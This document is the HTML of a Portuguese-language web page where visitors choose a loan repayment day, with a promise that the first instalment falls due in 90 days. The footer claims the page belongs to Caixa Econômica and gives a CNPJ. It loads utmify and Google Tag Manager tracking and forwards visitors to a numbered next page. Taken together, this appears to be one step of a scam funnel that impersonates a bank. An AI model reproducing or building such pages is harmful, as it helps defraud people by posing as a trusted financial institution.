﻿<!DOCTYPE html><html><head>
<script>
  window.pixelId = "67f41a1b2e2b5203c9648cd6";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  async
  defer
></script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-TGV5XJVC');</script>
<!-- End Google Tag Manager -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>Seleção de Data de Pagamento</title>
    
      

<script src="../scripts/utms/latest-6.js" data-utmify-prevent-subids="" async="" defer=""></script>


    

    <link rel="stylesheet" href="css/qJZO5PMzKU8U.css">
</head>

<body>
    <div class="container">
        <div class="header" style="background-color: white; padding: 18px; display: flex; justify-content: center;">
            <img src="images/logo.png" alt="" style="width: 100%; max-width: 180px;">
        </div>

        <h2>Escolha o melhor dia para pagar</h2>

        <p class="subtitle">Selecione a data mais adequada para o seu planejamento</p>

        <div class="alert">
            <span class="star">★</span>

            Oferecemos um prazo especial de carência! Sua primeira parcela só será paga daqui a 90 dias.
        </div>

        <div class="date-options">
            <div class="date-option" data-day="5">
                <svg class="calendar-icon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                    <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect>

                    <line x1="16" y1="2" x2="16" y2="6"></line>

                    <line x1="8" y1="2" x2="8" y2="6"></line>

                    <line x1="3" y1="10" x2="21" y2="10"></line>
                </svg>

                Dia 5 de cada mês
            </div>

            <div class="date-option" data-day="10">
                <svg class="calendar-icon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                    <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect>

                    <line x1="16" y1="2" x2="16" y2="6"></line>

                    <line x1="8" y1="2" x2="8" y2="6"></line>

                    <line x1="3" y1="10" x2="21" y2="10"></line>
                </svg>

                Dia 10 de cada mês
            </div>

            <div class="date-option" data-day="15">
                <svg class="calendar-icon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                    <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect>

                    <line x1="16" y1="2" x2="16" y2="6"></line>

                    <line x1="8" y1="2" x2="8" y2="6"></line>

                    <line x1="3" y1="10" x2="21" y2="10"></line>
                </svg>

                Dia 15 de cada mês
            </div>

            <div class="date-option" data-day="20">
                <svg class="calendar-icon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                    <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect>

                    <line x1="16" y1="2" x2="16" y2="6"></line>

                    <line x1="8" y1="2" x2="8" y2="6"></line>

                    <line x1="3" y1="10" x2="21" y2="10"></line>
                </svg>

                Dia 20 de cada mês
            </div>

            <div class="date-option" data-day="25">
                <svg class="calendar-icon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                    <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect>

                    <line x1="16" y1="2" x2="16" y2="6"></line>

                    <line x1="8" y1="2" x2="8" y2="6"></line>

                    <line x1="3" y1="10" x2="21" y2="10"></line>
                </svg>

                Dia 25 de cada mês
            </div>

            <div class="date-option" data-day="30">
                <svg class="calendar-icon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                    <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect>

                    <line x1="16" y1="2" x2="16" y2="6"></line>

                    <line x1="8" y1="2" x2="8" y2="6"></line>

                    <line x1="3" y1="10" x2="21" y2="10"></line>
                </svg>

                Dia 30 de cada mês
            </div>
        </div>

        <div id="selected-date" class="selected-date"></div>

        <button class="continue-btn" onclick="redirectWithUTMs();">Continuar</button>

        <footer>
            <p>© 2025 Caixa Econômica - Todos os direitos reservados</p>

            <p>CNPJ: 09.694.966/0001-40</p>

            <p>Política de Privacidade</p>
        </footer>
    </div>

    <script src="js/1Mdkm59nmmfA.js"></script>

    <script>
        function redirectWithUTMs() {
            window.location.href = '../page-08' + window.location.search;
        }
    </script>



</body>
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TGV5XJVC"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) --></html>